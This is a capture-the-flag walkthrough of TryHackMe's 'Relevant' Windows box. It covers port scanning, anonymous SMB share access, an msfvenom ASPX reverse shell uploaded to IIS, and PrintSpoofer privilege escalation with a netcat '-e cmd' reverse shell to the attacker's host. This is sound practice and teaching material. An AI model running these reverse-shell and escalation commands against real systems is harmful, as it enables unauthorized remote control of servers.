TryHackMe: Relevant — Walkthrough

Introduction

This article aims to walk you through Relevant box produced by The Mayor and hosted on TryHackMe. Anyone who has access to TryHackMe can try to pwn this Windows box, this is an intermediate and fun box. The creator of this box wants all practitioners to approach this box as a real life penetration testing. Hope you enjoy reading the walkthrough!

Reconnaissance

First of all, we are going to start the box after accessing the relevant page.

Starting Relevant

Waiting for a while, we are provided with IP address of the box, so we will scan it via Nmap.

Scanning

We are going to scan the IP for all open ports by typing the following command on our terminal. -p- indicates that we want to check all open ports.

nmap -p- 10.10.x.x

After waiting for a while, we have got our results as shown below:

Nmap Port Scanning

From open ports found by nmap, we understand that it is a Windows box. To gather further information on ports found by nmap, we will add some more arguments specifying open ports. -sV will scan to show service versions of applications on open ports, and -sC will run default scripts on services in order to check whether there is a vulnerability.

nmap -p 80,135,139,445,3389,49663,49667,49669 10.10.x.x -sV -sC

In a short while, we have got our results and more details regarding open ports. And we decide to start enumeration on SMB ports and we will go on enumeration on other ports since we have two http servers.

Nmap Specified Port Scanning

Enumeration

We list SMB shares on the target box as follows and we get some results.

smbclient -L 10.10.x.x

SMB Enumeration

We discover that there is a shared Disk on the SMB server called nt4wrksv, and we will try to connect to enumerate it further.

smbclient \\\\10.10.x.x\\nt4wrksv

SMB Connection

We are able to connect to the server without credentials. Now, we will enumerate this Disk to see we have something useful.

SMB Enumeration for Useful Files

We come across a passwords.txt file, which may gives us credentials to RDP to the box or login on the HTTP servers. We get the file and read the password.txt file.

Decoding BAse64 Encoded Strings

We see that there are two strings in it, and these strings are base64 encoded, so we decode them and get two users and two passwords for each user.

Now we will try to connect to the target box to be able to execute commands remotely via psexec.

Connecting through Psexec

We have an error while using the first credentials we found on SMB server.

Connecting through Psexec on Other User Found

We try other credentials and we are not able to be authenticated on the server.

We also try to RDP into the box since port 3389 is open, but credentials do not work for RDP connection as well.

Now we will try to enumerate further on HTTP servers we found during information gathering on the box.

HTTP Enumeration

We check HTTP server on port 80, and we try to bruteforce directories with gobuster; however, there is nothing of use for us. So, we now move on the other HTTP server on port 49663 to see we have something there to get a low shell on the box.

HTTP Enumeration on Port 49663

We see that it is again an IIS server, and we bruteforce the server for directory discovery with gobuster. Arguments we use for bruteforce indicates that we want gobuster to just show directories with 200 and 301 status (it sometimes does not work properly), and it should also exclude errors and to be faster we specify threads as 50.

gobsuter dir -u http/10.10.x.x:49663 -w directory-list-2.3-medium.txt -s ‘200,301’ — no-error -t 50

Directory Bruteforcing

We discover an interesting directory because we have seen nt4wrksv directory on SMB server as well. We should carefully enumerate further since it may be the path to low shell on the system.

Checking Directory Found via Gobuster

We type it following the URL and we see nothing, so we will add password.txt file to the end of the URL as it includes base64 strings and they may appear on the browser, if they appear, it means that we can upload a reverse shell on SMB server and execute it to get a reverse shell.

Checking Password.txt

As it is seen, we are now ready to exploit the server.

Exploitation

We create a reverse shell with .aspx extension file to execute it on the IIS server. So we will use msfvenom to create our reverse shell as follows:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.x.x.x LPORT=443 -f aspx > relevant.aspx

Creating a Reverse Shell with Msfvenom

We specify that we want our exploit to be windows executable, send connection to our Local host on Local port we defined, and file type should be aspx.

Uploading Reverse Shell

Then, we upload our reverse shell on the SMB server.

Setting up a Netcat Listener

We set up a netcat listener on our terminal to get the reverse conncetion.

Curling Reverse Shell to Execute

Now, we curl the URL indicating the place of our reverse shell on the server to execute it.

Getting a Low Shell on the Target

As it is seen, now we have a low shell on the target box and we are going to get our low shell hash.

Low Shell User Hash

Privilege Escalation

We enumerate the machine to find weak services and files on the server.

Privilege Escalation Enumeration

After enumerating the box for a while, we discover that SeImpersonatePrivilege is enabled for our current user, which means that we are able to abuse this to get full authority on the server.

We try to use two popular potato attacks, but we could not execute commands on the box since DCOM is disabled on the box which prevents our attacks, and there are no tokens to impersonate.

In this case, we google and see that we are able to abuse SeImpersonatePrivilege with a newer exploit called PrintSpoofer, instead of compiling it, we search for an already compiled one (it is not recommended as there may be exploits compiled intentionally for evil purposes) and found on github, we see that the creator of the box, shared compiled exploit, so we are good to go.

Uploading PrintSpoofer

After uploading the exploit via SMB server, we will upload netcat windows binary since we will try to get a reverse shell as root.

Checking PrintSpoofer

And uploading netcat windows binary.

Uploading and Checking Netcat Windows Binary

Now we are ready to escalate our privilege on the server. So we will set up another netcat listener on another terminal.

Setting up Another Netcat Listener to Get Another Reverse Shell

With the following command, we execute netcat binary we uploaded on the server to get a reverse shell.

PrintSpoofer.exe -c “c:\inetpub\wwwroot\nt4wrksv\nc.exe 10.x.x.x 443 -e cmd”

Executing Command on the Target Box

After executing the command on the low shell terminal, we check our netcat listener and we have got a shell as NT Authrotiy on the system.

Getting Reverse Shell as NT Authorithy

Now, it is time to get root hash.

Getting Root Shell

Now we have full authority on the box. Enjoy!

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store